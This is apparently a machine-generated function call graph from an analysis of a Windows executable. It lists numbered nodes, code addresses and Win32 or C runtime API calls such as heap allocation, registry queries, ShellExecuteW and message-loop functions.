86143->86145 86146 40e1ba 86145->86146 86146->86110 86147->86111 86149 401b9c 86148->86149 86169 401c7e 86148->86169 86170 4013c0 86149->86170 86152 42722b LoadStringW 86155 427246 86152->86155 86153 401bb9 86175 402160 86153->86175 86189 40e0a0 86155->86189 86156 401bcd 86158 427258 86156->86158 86159 401bda 86156->86159 86193 40d200 52 API calls 2 library calls 86158->86193 86159->86155 86161 401be4 86159->86161 86188 40d200 52 API calls 2 library calls 86161->86188 86163 427267 86164 42727b 86163->86164 86166 401bf3 _wcscpy __crtGetStringTypeA_stat _wcsncpy 86163->86166 86194 40d200 52 API calls 2 library calls 86164->86194 86168 401c62 Shell_NotifyIconW 86166->86168 86167 427289 86168->86169 86169->86119 86195 4115d7 86170->86195 86176 426daa 86175->86176 86177 40216b _wcslen 86175->86177 86233 40c600 86176->86233 86180 402180 86177->86180 86181 40219e 86177->86181 86179 426db5 86179->86156 86232 403bd0 52 API calls ctype 86180->86232 86182 4013a0 52 API calls 86181->86182 86184 4021a5 86182->86184 86186 426db7 86184->86186 86187 4115d7 52 API calls 86184->86187 86185 402187 _memmove 86185->86156 86187->86185 86188->86166 86190 40e0b2 86189->86190 86191 40e0a8 86189->86191 86190->86166 86245 403c30 52 API calls _memmove 86191->86245 86193->86163 86194->86167 86198 4115e1 _malloc 86195->86198 86197 4013e4 86206 4013a0 86197->86206 86198->86197 86201 4115fd std::exception::exception 86198->86201 86209 4135bb 86198->86209 86199 41163b 86224 4180af 46 API calls std::exception::operator= 86199->86224 86201->86199 86223 41130a 51 API calls __cinit 86201->86223 86202 411645 86225 418105 RaiseException 86202->86225 86205 411656 86207 4115d7 52 API calls 86206->86207 86208 4013a7 86207->86208 86208->86152 86208->86153 86210 413638 _malloc 86209->86210 86219 4135c9 _malloc 86209->86219 86231 417f77 46 API calls __getptd_noexit 86210->86231 86213 4135f7 RtlAllocateHeap 86213->86219 86222 413630 86213->86222 86215 413624 86229 417f77 46 API calls __getptd_noexit 86215->86229 86218 4135d4 86218->86219 86226 418901 46 API calls 2 library calls 86218->86226 86227 418752 46 API calls 8 library calls 86218->86227 86228 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86218->86228 86219->86213 86219->86215 86219->86218 86220 413622 86219->86220 86230 417f77 46 API calls __getptd_noexit 86220->86230 86222->86198 86223->86199 86224->86202 86225->86205 86226->86218 86227->86218 86229->86220 86230->86222 86231->86222 86232->86185 86234 40c619 86233->86234 86235 40c60a 86233->86235 86234->86179 86235->86234 86238 4026f0 86235->86238 86237 426d7a _memmove 86237->86179 86239 426873 86238->86239 86240 4026ff 86238->86240 86241 4013a0 52 API calls 86239->86241 86240->86237 86242 42687b 86241->86242 86243 4115d7 52 API calls 86242->86243 86244 42689e _memmove 86243->86244 86244->86237 86245->86190 86246->86141 86247 40bd20 86248 428194 86247->86248 86249 40bd2d 86247->86249 86250 40bd43 86248->86250 86252 4281bc 86248->86252 86254 4281b2 86248->86254 86251 40bd37 86249->86251 86270 4531b1 85 API calls 5 library calls 86249->86270 86259 40bd50 86251->86259 86269 45e987 86 API calls ctype 86252->86269 86268 40b510 VariantClear 86254->86268 86258 4281ba 86260 426cf1 86259->86260 86261 40bd63 86259->86261 86280 44cde9 52 API calls _memmove 86260->86280 86271 40bd80 86261->86271 86264 40bd73 86264->86250 86265 426cfc 86266 40e0a0 52 API calls 86265->86266 86267 426d02 86266->86267 86268->86258 86269->86249 86270->86251 86272 40bd8e 86271->86272 86279 40bdb7 _memmove 86271->86279 86273 40bded 86272->86273 86274 40bdad 86272->86274 86272->86279 86275 4115d7 52 API calls 86273->86275 86281 402f00 86274->86281 86277 40bdf6 86275->86277 86278 4115d7 52 API calls 86277->86278 86277->86279 86278->86279 86279->86264 86280->86265 86282 402f10 86281->86282 86283 402f0c 86281->86283 86284 4115d7 52 API calls 86282->86284 86285 4268c3 86282->86285 86283->86279 86286 402f51 ctype _memmove 86284->86286 86286->86279 86287 425ba2 86292 40e360 86287->86292 86289 425bb4 86308 41130a 51 API calls __cinit 86289->86308 86291 425bbe 86293 4115d7 52 API calls 86292->86293 86294 40e3ec GetModuleFileNameW 86293->86294 86309 413a0e 86294->86309 86296 40e421 _wcsncat 86312 413a9e 86296->86312 86299 4115d7 52 API calls 86300 40e45e _wcscpy 86299->86300 86315 40bc70 86300->86315 86304 40e4a9 86304->86289 86305 401c90 52 API calls 86307 40e4a1 _wcscat _wcslen _wcsncpy 86305->86307 86306 4115d7 52 API calls 86306->86307 86307->86304 86307->86305 86307->86306 86308->86291 86334 413801 86309->86334 86364 419efd 86312->86364 86316 4115d7 52 API calls 86315->86316 86317 40bc98 86316->86317 86318 4115d7 52 API calls 86317->86318 86319 40bca6 86318->86319 86320 40e4c0 86319->86320 86376 403350 86320->86376 86322 40e4cb RegOpenKeyExW 86323 427190 RegQueryValueExW 86322->86323 86324 40e4eb 86322->86324 86325 4271b0 86323->86325 86326 42721a RegCloseKey 86323->86326 86324->86307 86327 4115d7 52 API calls 86325->86327 86326->86307 86328 4271cb 86327->86328 86383 43652f 52 API calls 86328->86383 86330 4271d8 RegQueryValueExW 86331 4271f7 86330->86331 86333 42720e 86330->86333 86332 402160 52 API calls 86331->86332 86332->86333 86333->86326 86335 41389e 86334->86335 86342 41381a 86334->86342 86336 4139e8 86335->86336 86338 413a00 86335->86338 86361 417f77 46 API calls __getptd_noexit 86336->86361 86363 417f77 46 API calls __getptd_noexit 86338->86363 86339 4139ed 86362 417f25 10 API calls _xtow_s@20 86339->86362 86342->86335 86348 41388a 86342->86348 86356 419e30 46 API calls _xtow_s@20 86342->86356 86344 41396c 86344->86335 86346 413967 86344->86346 86349 41397a 86344->86349 86345 413929 86345->86335 86347 413945 86345->86347 86358 419e30 46 API calls _xtow_s@20 86345->86358 86346->86296 86347->86335 86347->86346 86352 41395b 86347->86352 86348->86335 86355 413909 86348->86355 86357 419e30 46 API calls _xtow_s@20 86348->86357 86360 419e30 46 API calls _xtow_s@20 86349->86360 86359 419e30 46 API calls _xtow_s@20 86352->86359 86355->86344 86355->86345 86356->86348 86357->86355 86358->86347 86359->86346 86360->86346 86361->86339 86362->86346 86363->86346 86365 419f13 86364->86365 86366 419f0e 86364->86366 86373 417f77 46 API calls __getptd_noexit 86365->86373 86366->86365 86372 419f2b 86366->86372 86368 419f18 86374 417f25 10 API calls _xtow_s@20 86368->86374 86371 40e454 86371->86299 86372->86371 86375 417f77 46 API calls __getptd_noexit 86372->86375 86373->86368 86374->86371 86375->86368 86377 403367 86376->86377 86378 403358 86376->86378 86379 4115d7 52 API calls 86377->86379 86378->86322 86380 403370 86379->86380 86381 4115d7 52 API calls 86380->86381 86382 40339e 86381->86382 86382->86322 86383->86330 86384 416454 86421 416c70 86384->86421 86386 416460 GetStartupInfoW 86387 416474 86386->86387 86422 419d5a HeapCreate 86387->86422 86389 4164cd 86390 4164d8 86389->86390 86506 41642b 46 API calls 3 library calls 86389->86506 86423 417c20 GetModuleHandleW 86390->86423 86393 4164de 86394 4164e9 __RTC_Initialize 86393->86394 86507 41642b 46 API calls 3 library calls 86393->86507 86442 41aaa1 GetStartupInfoW 86394->86442 86398 416503 GetCommandLineW 86455 41f584 GetEnvironmentStringsW 86398->86455 86402 416513 86461 41f4d6 GetModuleFileNameW 86402->86461 86404 41651d 86405 416528 86404->86405 86509 411924 46 API calls 3 library calls 86404->86509 86465 41f2a4 86405->86465 86408 41652e 86409 416539 86408->86409 86510 411924 46 API calls 3 library calls 86408->86510 86479 411703 86409->86479 86412 416541 86414 41654c __wwincmdln 86412->86414 86511 411924 46 API calls 3 library calls 86412->86511 86483 40d6b0 86414->86483 86417 41657c 86513 411906 46 API calls _doexit 86417->86513 86420 416581 __tsopen_nolock 86421->86386 86422->86389 86424 417c34 86423->86424 86425 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86423->86425 86514 4178ff 49 API calls _free 86424->86514 86427 417c87 TlsAlloc 86425->86427 86430 417cd5 TlsSetValue 86427->86430 86431 417d96 86427->86431 86428 417c39 86428->86393 86430->86431 86432 417ce6 __init_pointers 86430->86432 86431->86393 86515 418151 InitializeCriticalSectionAndSpinCount 86432->86515 86434 417d91 86523 4178ff 49 API calls _free 86434->86523 86436 417d2a 86436->86434 86516 416b49 86436->86516 86439 417d76 86522 41793c 46 API calls 4 library calls 86439->86522 86441 417d7e GetCurrentThreadId 86441->86431 86443 416b49 __calloc_crt 46 API calls 86442->86443 86452 41aabf 86443->86452 86444 41ac34 86445 41ac6a GetStdHandle 86444->86445 86447 41acce SetHandleCount 86444->86447 86448 41ac7c GetFileType 86444->86448 86453 41aca2 InitializeCriticalSectionAndSpinCount 86444->86453 86445->86444 86446 416b49 __calloc_crt 46 API calls 86446->86452 86454 4164f7 86447->86454 86448->86444 86449 41abb4 86449->86444 86450 41abe0 GetFileType 86449->86450 86451 41abeb InitializeCriticalSectionAndSpinCount 86449->86451 86450->86449 86450->86451 86451->86449 86451->86454 86452->86444 86452->86446 86452->86449 86452->86454 86453->86444 86453->86454 86454->86398 86508 411924 46 API calls 3 library calls 86454->86508 86456 41f595 86455->86456 86457 41f599 86455->86457 86456->86402 86533 416b04 86457->86533 86459 41f5bb _memmove 86460 41f5c2 FreeEnvironmentStringsW 86459->86460 86460->86402 86462 41f50b _wparse_cmdline 86461->86462 86463 416b04 __malloc_crt 46 API calls 86462->86463 86464 41f54e _wparse_cmdline 86462->86464 86463->86464 86464->86404 86466 41f2bc _wcslen 86465->86466 86470 41f2b4 86465->86470 86467 416b49 __calloc_crt 46 API calls 86466->86467 86472 41f2e0 _wcslen 86467->86472 86468 41f336 86540 413748 86468->86540 86470->86408 86471 416b49 __calloc_crt 46 API calls 86471->86472 86472->86468 86472->86470 86472->86471 86473 41f35c 86472->86473 86476 41f373 86472->86476 86539 41ef12 46 API calls _xtow_s@20 86472->86539 86474 413748 _free 46 API calls 86473->86474 86474->86470 86546 417ed3 86476->86546 86478 41f37f 86478->86408 86480 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86479->86480 86482 411750 __IsNonwritableInCurrentImage 86480->86482 86565 41130a 51 API calls __cinit 86480->86565 86482->86412 86484 42e2f3 86483->86484 86485 40d6cc 86483->86485 86566 408f40 86485->86566 86487 40d707 86570 40ebb0 86487->86570 86493 40d737 86573 411951 86493->86573 86495 40d751 86585 40f4e0 SystemParametersInfoW SystemParametersInfoW 86495->86585 86497 40d75f 86586 40d590 GetCurrentDirectoryW 86497->86586 86499 40d767 SystemParametersInfoW 86500 40d794 86499->86500 86501 40d78d FreeLibrary 86499->86501 86502 408f40 VariantClear 86500->86502 86501->86500 86503 40d79d 86502->86503 86504 408f40 VariantClear 86503->86504 86505 40d7a6 86504->86505 86505->86417 86512 4118da 46 API calls _doexit 86505->86512 86506->86390 86507->86394 86512->86417 86513->86420 86514->86428 86515->86436 86518 416b52 86516->86518 86519 416b8f 86518->86519 86520 416b70 Sleep 86518->86520 86524 41f677 86518->86524 86519->86434 86519->86439 86521 416b85 86520->86521 86521->86518 86521->86519 86522->86441 86523->86431 86525 41f683 86524->86525 86531 41f69e _malloc 86524->86531 86526 41f68f 86525->86526 86525->86531 86532 417f77 46 API calls __getptd_noexit 86526->86532 86528 41f6b1 HeapAlloc 86530 41f6d8 86528->86530 86528->86531 86529 41f694 86529->86518 86530->86518 86531->86528 86531->86530 86532->86529 86534 416b0d 86533->86534 86535 4135bb _malloc 45 API calls 86534->86535 86536 416b43 86534->86536 86537 416b24 Sleep 86534->86537 86535->86534 86536->86459 86538 416b39 86537->86538 86538->86534 86538->86536 86539->86472 86541 41377c __dosmaperr 86540->86541 86542 413753 RtlFreeHeap 86540->86542 86541->86470 86542->86541 86543 413768 86542->86543 86549 417f77 46 API calls __getptd_noexit 86543->86549 86545 41376e GetLastError 86545->86541 86550 417daa 86546->86550 86549->86545 86551 417dc9 __crtGetStringTypeA_stat __call_reportfault 86550->86551 86552 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86551->86552 86555 417eb5 __call_reportfault 86552->86555 86554 417ed1 GetCurrentProcess TerminateProcess 86554->86478 86556 41a208 86555->86556 86557 41a210 86556->86557 86558 41a212 IsDebuggerPresent 86556->86558 86557->86554 86564 41fe19 86558->86564 86561 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86562 421ff0 __call_reportfault 86561->86562 86563 421ff8 GetCurrentProcess TerminateProcess 86561->86563 86562->86563 86563->86554 86564->86561 86565->86482 86568 408f48 ctype 86566->86568 86567 4265c7 VariantClear 86569 408f55 ctype 86567->86569 86568->86567 86568->86569 86569->86487 86626 40ebd0 86570->86626 86630 4182cb 86573->86630 86575 41195e 86637 4181f2 LeaveCriticalSection 86575->86637 86577 40d748 86578 4119b0 86577->86578 86579 4119d6 86578->86579 86580 4119bc 86578->86580 86579->86495 86580->86579 86672 417f77 46 API calls __getptd_noexit 86580->86672 86582 4119c6 86673 417f25 10 API calls _xtow_s@20 86582->86673 86584 4119d1 86584->86495 86585->86497 86674 401f20 86586->86674 86588 40d5b6 IsDebuggerPresent 86589 40d5c4 86588->86589 86590 42e1bb MessageBoxA 86588->86590 86591 42e1d4 86589->86591 86592 40d5e3 86589->86592 86590->86591 86846 403a50 52 API calls 3 library calls 86591->86846 86744 40f520 86592->86744 86596 40d5fd GetFullPathNameW 86756 401460 86596->86756 86598 40d63b 86599 40d643 86598->86599 86601 42e231 SetCurrentDirectoryW 86598->86601 86600 40d64c 86599->86600 86847 432fee 6 API calls 86599->86847 86771 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86600->86771 86601->86599 86605 42e252 86605->86600 86606 42e25a GetModuleFileNameW 86605->86606 86608 42e274 86606->86608 86609 42e2cb GetForegroundWindow ShellExecuteW 86606->86609 86848 401b10 86608->86848 86613 40d688 86609->86613 86610 40d656 86612 40d669 86610->86612 86615 40e0c0 74 API calls 86610->86615 86779 4091e0 86612->86779 86619 40d692 SetCurrentDirectoryW 86613->86619 86615->86612 86619->86499 86620 42e28d 86855 40d200 52 API calls 2 library calls 86620->86855 86623 42e299 GetForegroundWindow ShellExecuteW 86624 42e2c6 86623->86624 86624->86613 86625 40ec00 LoadLibraryA GetProcAddress 86625->86493 86627 40d72e 86626->86627 86628 40ebd6 LoadLibraryA 86626->86628 86627->86493 86627->86625 86628->86627 86629 40ebe7 GetProcAddress 86628->86629 86629->86627 86631 4182e0 86630->86631 86632 4182f3 EnterCriticalSection 86630->86632 86638 418209 86631->86638 86632->86575 86634 4182e6 86634->86632 86665 411924 46 API calls 3 library calls 86634->86665 86637->86577 86639 418215 __tsopen_nolock 86638->86639 86640 418225 86639->86640 86641 41823d 86639->86641 86666 418901 46 API calls 2 library calls 86640->86666 86643 416b04 __malloc_crt 45 API calls 86641->86643 86650 41824b __tsopen_nolock 86641->86650 86645 418256 86643->86645 86644 41822a 86667 418752 46 API calls 8 library calls 86644->86667 86648 41825d 86645->86648 86649 41826c 86645->86649 86647 418231 86668 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86647->86668 86669 417f77 46 API calls __getptd_noexit 86648->86669 86653 4182cb __lock 45 API calls 86649->86653 86650->86634 86655 418273 86653->86655 86656 4182a6 86655->86656 86657 41827b InitializeCriticalSectionAndSpinCount 86655->86657 86658 413748 _free 45 API calls 86656->86658 86659 418297 86657->86659 86660 41828b 86657->86660 86658->86659 86671 4182c2 LeaveCriticalSection _doexit 86659->86671 86661 413748 _free 45 API calls 86660->86661 86662 418291 86661->86662 86670 417f77 46 API calls __getptd_noexit 86662->86670 86666->86644 86667->86647 86669->86650 86670->86659 86671->86650 86672->86582 86673->86584 86856 40e6e0 86674->86856 86678 401f41 GetModuleFileNameW 86874 410100 86678->86874 86680 401f5c 86886 410960 86680->86886 86683 401b10 52 API calls 86684 401f81 86683->86684 86889 401980 86684->86889 86686 401f8e 86687 408f40 VariantClear 86686->86687 86688 401f9d 86687->86688 86689 401b10 52 API calls 86688->86689 86690 401fb4 86689->86690 86691 401980 53 API calls 86690->86691 86692 401fc3 86691->86692 86693 401b10 52 API calls 86692->86693 86694 401fd2 86693->86694 86897 40c2c0 86694->86897 86696 401fe1 86697 40bc70 52 API calls 86696->86697 86698 401ff3 86697->86698 86915 401a10 86698->86915 86700 401ffe 86922 4114ab 86700->86922 86703 428b05 86705 401a10 52 API calls 86703->86705 86704 402017 86706 4114ab __wcsicoll 58 API calls 86704->86706 86707 428b18 86705->86707 86708 402022 86706->86708 86710 401a10 52 API calls 86707->86710 86708->86707 86709 40202d 86708->86709 86711 4114ab __wcsicoll 58 API calls 86709->86711 86712 428b33 86710->86712 86713 402038 86711->86713 86715 428b3b GetModuleFileNameW 86712->86715 86714 402043 86713->86714 86713->86715 86716 4114ab __wcsicoll 58 API calls 86714->86716 86717 401a10 52 API calls 86715->86717 86718 40204e 86716->86718 86719 428b6c 86717->86719 86720 402092 86718->86720 86726 401a10 52 API calls 86718->86726 86729 428b90 _wcscpy 86718->86729 86721 40e0a0 52 API calls 86719->86721 86722 4020a3 86720->86722 86720->86729 86723 428b7a 86721->86723 86725 428bc6 86722->86725 86930 40e830 53 API calls 86722->86930 86724 401a10 52 API calls 86723->86724 86728 428b88 86724->86728 86727 402073 _wcscpy 86726->86727 86734 401a10 52 API calls 86727->86734 86728->86729 86731 401a10 52 API calls 86729->86731 86739 4020d0 86731->86739 86732 4020bb 86931 40cf00 53 API calls 86732->86931 86734->86720 86735 4020c6 86736 408f40 VariantClear 86735->86736 86736->86739 86738 402110 86741 408f40 VariantClear 86738->86741 86739->86738 86742 401a10 52 API calls 86739->86742 86932 40cf00 53 API calls 86739->86932 86933 40e6a0 53 API calls 86739->86933 86743 402120 ctype 86741->86743 86742->86739 86743->86588 86745 4295c9 __crtGetStringTypeA_stat 86744->86745 86746 40f53c 86744->86746 86748 4295d9 GetOpenFileNameW 86745->86748 87612 410120 86746->87612 86748->86746 86750 40d5f5 86748->86750 86749 40f545 87616 4102b0 SHGetMalloc 86749->87616 86750->86596 86750->86598 86752 40f54c 87621 410190 GetFullPathNameW 86752->87621 86754 40f559 87632 40f570 86754->87632 87694 402400 86756->87694 86758 40146f 86761 428c29 _wcscat 86758->86761 87703 401500 86758->87703 86760 40147c 86760->86761 87711 40d440 86760->87711 86763 401489 86763->86761 86764 401491 GetFullPathNameW 86763->86764 86765 402160 52 API calls 86764->86765 86766 4014bb 86765->86766 86767 402160 52 API calls 86766->86767 86768 4014c8 86767->86768 86768->86761 86769 402160 52 API calls 86768->86769 86770 4014ee 86769->86770 86770->86598 86772 428361 86771->86772 86773 4103fc LoadImageW RegisterClassExW 86771->86773 87731 44395e EnumResourceNamesW LoadImageW 86772->87731 87730 410490 7 API calls 86773->87730 86776 40d651 86778 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86776->86778 86777 428368 86778->86610 86780 409202 86779->86780 86781 42d7ad 86779->86781 86839 409216 ctype 86780->86839 88003 410940 331 API calls 86780->88003 88006 45e737 90 API calls 3 library calls 86781->88006 86784 409386 86785 40939c 86784->86785 88004 40f190 10 API calls 86784->88004 86785->86613 86845 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 86785->86845 86787 4095b2 86787->86785 86788 4095bf 86787->86788 88005 401a50 331 API calls 86788->88005 86789 409253 PeekMessageW 86789->86839 86791 40d410 VariantClear 86791->86839 86792 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86792->86785 86794 4095f9 86792->86794 86793 42d8cd Sleep 86793->86839 86798 42e158 TranslateMessage DispatchMessageW GetMessageW 86794->86798 86796 42e13b 88024 40d410 VariantClear 86796->88024 86798->86798 86801 42e188 86798->86801 86800 409567 PeekMessageW 86800->86839 86801->86785 86804 44c29d 52 API calls 86844 4094e0 86804->86844 86805 46f3c1 107 API calls 86805->86839 86806 40e0a0 52 API calls 86806->86839 86807 46fdbf 108 API calls 86807->86844 86808 409551 TranslateMessage DispatchMessageW 86808->86800 86810 42dcd2 WaitForSingleObject 86811 42dcf0 GetExitCodeProcess CloseHandle 86810->86811 86810->86839 88013 40d410 VariantClear 86811->88013 86813 42dd3d Sleep 86813->86844 86814 47d33e 309 API calls 86814->86839 86817 4094cf Sleep 86817->86844 86818 408f40 VariantClear 86818->86844 86820 42d94d timeGetTime 88009 465124 53 API calls 86820->88009 86822 40c620 timeGetTime 86822->86844 86825 465124 53 API calls 86825->86844 86826 42dd89 CloseHandle 86826->86844 86828 42de19 GetExitCodeProcess CloseHandle 86828->86844 86830 401b10 52 API calls 86830->86844 86833 42de88 Sleep 86833->86839 86835 45e737 90 API calls 86835->86839 86838 42e0cc VariantClear 86838->86839 86839->86784 86839->86789 86839->86791 86839->86793 86839->86796 86839->86800 86839->86805 86839->86806 86839->86808 86839->86810 86839->86813 86839->86814 86839->86817 86839->86820 86839->86835 86839->86838 86840 408f40 VariantClear 86839->86840 86839->86844 87732 4091b0 86839->87732 87790 40afa0 86839->87790 87816 408fc0 86839->87816 87851 408cc0 86839->87851 87865 40d150 86839->87865 87870 40d170 86839->87870 87876 4096a0 86839->87876 88007 465124 53 API calls 86839->88007 88008 40c620 timeGetTime 86839->88008 88023 40e270 VariantClear ctype 86839->88023 86840->86839 86842 401980 53 API calls 86842->86844 86844->86804 86844->86807 86844->86818 86844->86822 86844->86825 86844->86826 86844->86828 86844->86830 86844->86833 86844->86839 86844->86842 88010 45178a 54 API calls 86844->88010 88011 47d33e 331 API calls 86844->88011 88012 453bc6 54 API calls 86844->88012 88014 40d410 VariantClear 86844->88014 88015 443d19 67 API calls _wcslen 86844->88015 88016 4574b4 VariantClear 86844->88016 88017 403cd0 86844->88017 88021 4731e1 VariantClear 86844->88021 88022 4331a2 6 API calls 86844->88022 86845->86613 86846->86598 86847->86605 86849 401b16 _wcslen 86848->86849 86850 4115d7 52 API calls 86849->86850 86853 401b63 86849->86853 86851 401b4b _memmove 86850->86851 86852 4115d7 52 API calls 86851->86852 86852->86853 86854 40d200 52 API calls 2 library calls 86853->86854 86854->86620 86855->86623 86857 40bc70 52 API calls 86856->86857 86858 401f31 86857->86858 86859 402560 86858->86859 86860 40256d __write_nolock 86859->86860 86861 402160 52 API calls 86860->86861 86863 402593 86861->86863 86867 4025bd 86863->86867 86934 401c90 86863->86934 86864 4026f0 52 API calls 86864->86867 86865 4026db 86865->86678 86866 4026a7 86866->86865 86868 401b10 52 API calls 86866->86868 86867->86864 86867->86866 86869 401b10 52 API calls 86867->86869 86871 401c90 52 API calls 86867->86871 86937 40d7c0 52 API calls 2 library calls 86867->86937 86870 4026d1 86868->86870 86869->86867 86938 40d7c0 52 API calls 2 library calls 86870->86938 86871->86867 86939 40f760 86874->86939 86877 410118 86877->86680 86879 42805d 86882 42806a 86879->86882 86995 431e58 86879->86995 86881 413748 _free 46 API calls 86883 428078 86881->86883 86882->86881 86884 431e58 82 API calls 86883->86884 86885 428084 86884->86885 86885->86680 86887 4115d7 52 API calls 86886->86887 86888 401f74 86887->86888 86888->86683 86890 4019a3 86889->86890 86894 401985 86889->86894 86891 4019b8 86890->86891 86890->86894 87601 403e10 53 API calls 86891->87601 86893 40199f 86893->86686 86894->86893 87600 403e10 53 API calls 86894->87600 86895 4019c4 86895->86686 86898 40c2c7 86897->86898 86899 40c30e 86897->86899 86900 40c2d3 86898->86900 86907 426c79 86898->86907 86901 40c315 86899->86901 86902 426c2b 86899->86902 87602 403ea0 52 API calls __cinit 86900->87602 86905 40c321 86901->86905 86906 426c5a 86901->86906 86904 426c4b 86902->86904 86908 426c2e 86902->86908 87605 4534e3 52 API calls 86904->87605 87603 403ea0 52 API calls __cinit 86905->87603 87606 4534e3 52 API calls 86906->87606 87607 4534e3 52 API calls 86907->87607 86913 40c2de 86908->86913 87604 4534e3 52 API calls 86908->87604 86913->86696 86916 401a30 86915->86916 86917 401a17 86915->86917 86919 402160 52 API calls 86916->86919 86918 401a2d 86917->86918 87608 403c30 52 API calls _memmove 86917->87608 86918->86700 86921 401a3d 86919->86921 86921->86700 86923 411523 86922->86923 86924 4114ba 86922->86924 87611 4113a8 58 API calls 3 library calls 86923->87611 86928 40200c 86924->86928 87609 417f77 46 API calls __getptd_noexit 86924->87609 86927 4114c6 87610 417f25 10 API calls _xtow_s@20 86927->87610 86928->86703 86928->86704 86930->86732 86931->86735 86932->86739 86933->86739 86935 4026f0 52 API calls 86934->86935 86936 401c97 86935->86936 86936->86863 86937->86867 86938->86865 86999 40f6f0 86939->86999 86941 40f77b _strcat ctype 87007 40f850 86941->87007 86946 427c2a 87036 414d04 86946->87036 86948 40f7fc 86948->86946 86950 40f804 86948->86950 87023 414a46 86950->87023 86953 40f80e 86953->86877 86958 4528bd 86953->86958 86955 427c59 87042 414fe2 86955->87042 86957 427c79 86959 4150d1 _fseek 81 API calls 86958->86959 86960 452930 86959->86960 87542 452719 86960->87542 86963 452948 86963->86879 86964 414d04 __fread_nolock 61 API calls 86965 452966 86964->86965 86966 414d04 __fread_nolock 61 API calls 86965->86966 86967 452976 86966->86967 86968 414d04 __fread_nolock 61 API calls 86967->86968 86969 45298f 86968->86969 86970 414d04 __fread_nolock 61 API calls 86969->86970 86971 4529aa 86970->86971 86972 4150d1 _fseek 81 API calls 86971->86972 86973 4529c4 86972->86973 86974 4135bb _malloc 46 API calls 86973->86974 86975 4529cf 86974->86975 86976 4135bb _malloc 46 API calls 86975->86976 86977 4529db 86976->86977 86978 414d04 __fread_nolock 61 API calls 86977->86978 86979 4529ec 86978->86979 86980 44afef GetSystemTimeAsFileTime 86979->86980 86981 452a00 86980->86981 86982 452a36 86981->86982 86983 452a13 86981->86983 86984 452aa5 86982->86984 86985 452a3c 86982->86985 86986 413748 _free 46 API calls 86983->86986 86988 413748 _free 46 API calls 86984->86988 87548 44b1a9 86985->87548 86989 452a1c 86986->86989 86991 452aa3 86988->86991 86992 413748 _free 46 API calls 86989->86992 86990 452a9d 86993 413748 _free 46 API calls 86990->86993 86991->86879 86994 452a25 86992->86994 86993->86991 86994->86879 86996 431e64 86995->86996 86997 431e6a 86995->86997 86998 414a46 __fcloseall 82 API calls 86996->86998 86997->86882 86998->86997 87000 425de2 86999->87000 87004 40f6fc _wcslen 86999->87004 87000->86941 87001 40f710 WideCharToMultiByte 87002 40f756 87001->87002 87003 40f728 87001->87003 87002->86941 87005 4115d7 52 API calls 87003->87005 87004->87001 87006 40f735 WideCharToMultiByte 87005->87006 87006->86941 87009 40f85d __crtGetStringTypeA_stat _strlen 87007->87009 87010 40f7ab 87009->87010 87055 414db8 87009->87055 87011 4149c2 87010->87011 87070 414904 87011->87070 87013 40f7e9 87013->86946 87014 40f5c0 87013->87014 87015 40f5cd _strcat __write_nolock _memmove 87014->87015 87016 414d04 __fread_nolock 61 API calls 87015->87016 87018 425d11 87015->87018 87022 40f691 __tzset_nolock 87015->87022 87158 4150d1 87015->87158 87016->87015 87019 4150d1 _fseek 81 API calls 87018->87019 87020 425d33 87019->87020 87021 414d04 __fread_nolock 61 API calls 87020->87021 87021->87022 87022->86948 87024 414a52 __tsopen_nolock 87023->87024 87025 414a64 87024->87025 87026 414a79 87024->87026 87298 417f77 46 API calls __getptd_noexit 87025->87298 87028 415471 __lock_file 47 API calls 87026->87028 87032 414a74 __tsopen_nolock 87026->87032 87030 414a92 87028->87030 87029 414a69 87299 417f25 10 API calls _xtow_s@20 87029->87299 87282 4149d9 87030->87282 87032->86953 87367 414c76 87036->87367 87038 414d1c 87039 44afef 87038->87039 87535 442c5a 87039->87535 87041 44b00d 87041->86955 87043 414fee __tsopen_nolock 87042->87043 87044 414ffa 87043->87044 87045 41500f 87043->87045 87539 417f77 46 API calls __getptd_noexit 87044->87539 87047 415471 __lock_file 47 API calls 87045->87047 87049 415017 87047->87049 87048 414fff 87540 417f25 10 API calls _xtow_s@20 87048->87540 87051 414e4e __ftell_nolock 51 API calls 87049->87051 87052 415024 87051->87052 87541 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87052->87541 87053 41500a __tsopen_nolock 87053->86957 87056 414dd6 87055->87056 87057 414deb 87055->87057 87066 417f77 46 API calls __getptd_noexit 87056->87066 87057->87056 87058 414df2 87057->87058 87068 41b91b 79 API calls 11 library calls 87058->87068 87061 414ddb 87067 417f25 10 API calls _xtow_s@20 87061->87067 87063 414e18 87064 414de6 87063->87064 87069 418f98 77 API calls 7 library calls 87063->87069 87064->87009 87066->87061 87067->87064 87068->87063 87069->87064 87073 414910 __tsopen_nolock 87070->87073 87071 414923 87126 417f77 46 API calls __getptd_noexit 87071->87126 87073->87071 87075 414951 87073->87075 87074 414928 87127 417f25 10 API calls _xtow_s@20 87074->87127 87089 41d4d1 87075->87089 87078 414956 87079 41496a 87078->87079 87080 41495d 87078->87080 87082 414992 87079->87082 87083 414972 87079->87083 87128 417f77 46 API calls __getptd_noexit 87080->87128 87106 41d218 87082->87106 87129 417f77 46 API calls __getptd_noexit 87083->87129 87084 414933 __tsopen_nolock @_EH4_CallFilterFunc@8 87084->87013 87090 41d4dd __tsopen_nolock 87089->87090 87091 4182cb __lock 46 API calls 87090->87091 87104 41d4eb 87091->87104 87092 41d567 87094 416b04 __malloc_crt 46 API calls 87092->87094 87093 41d560 87131 41d5fb 87093->87131 87096 41d56e 87094->87096 87096->87093 87098 41d57c InitializeCriticalSectionAndSpinCount 87096->87098 87097 41d5f0 __tsopen_nolock 87097->87078 87099 41d59c 87098->87099 87100 41d5af EnterCriticalSection 87098->87100 87103 413748 _free 46 API calls 87099->87103 87100->87093 87101 418209 __mtinitlocknum 46 API calls 87101->87104 87103->87093 87104->87092 87104->87093 87104->87101 87134 4154b2 47 API calls __lock 87104->87134 87135 415520 LeaveCriticalSection LeaveCriticalSection _doexit 